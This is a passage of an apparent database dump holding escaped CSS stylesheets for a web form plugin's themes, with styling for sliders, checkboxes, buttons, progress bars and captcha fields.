font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #2796B3 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/03/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #0B7A97;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #18627C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #56B4D5;\r\nfont-family: Segoe UI;\r\n}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/03/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #0C6177;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #2796B3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0E6378 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2C7487 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2D7587 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0E6378 ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2C7487 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2D7587 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0E6378 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2C7487 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2D7587 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0E6378 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2C7487 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2D7587 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0E6378 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2C7487 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2D7587 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #0E6378 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2C7487 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2D7587 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/03/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(12,'Theme 03 transparent (salmon button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8D6D7;\r\nborder: 1px solid #D8D6D7;\r\nmargin-bottom: 10px;\r\ncolor: #D8D6D7;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\nbackground: #FA8072;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #FFABA1;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #FF9689;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #ECECEC;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #ECECEC;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: 